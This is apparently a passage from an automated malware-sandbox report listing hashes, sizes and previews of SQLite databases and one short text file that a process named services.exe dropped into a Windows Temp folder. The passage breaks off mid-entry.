                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\LvePZpomFv

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):25
                                                              Entropy (8bit):4.243856189774723
                                                              Encrypted:false
                                                              SSDEEP:3:kr8aZp:knX
                                                              MD5:038534B21727276EC4CDAA478BC7AC91
                                                              SHA1:24A64110F5A168E2BDE4E6F1A70310C04B89D321
                                                              SHA-256:211B7B14ADC1AF99BAEF282F22F27D986DEF5F22012F7BE7FFD9B35F78B9AA74
                                                              SHA-512:1CC38222B49D345ECFB3264F71DB7FAC88290302D856A56B71803F876852BBD535CFB2ADCA3EE5E5CFA4A81528195B4CFE19549E3EE3350CCA8966D842900118
                                                              Malicious:false
                                                              Preview:ahNr24FKT7rp1H2AsgGZ322lL

                                                              C:\Users\user\AppData\Local\Temp\MIYBhrCUgm

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\MSPGxtGZSh

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\MV8BokqVHV

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\MaQEqbBQKF

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\Me1sywPqWl

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\MeIq1EYL80

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\MeRziK92q4

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\Mnx4gL08Iy

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\N7zjINRW8J

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\NCK03VsLfS

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\OHGJaKbV9E

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\OOYqLzQk4O

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\OWeEBgNptG

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\PAyZFUTzCW

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\PKFkIr3pdW

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\PN0KSSuuLX

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\PNZgMsyapx

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\POMdelZe2b

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\PYdyLtGKN8

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\PqFP84Szbo

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\QDxfU5GMgy

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\QGQuaEbx3u

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\QHh30v7LKb

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\RAFusG53yV

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
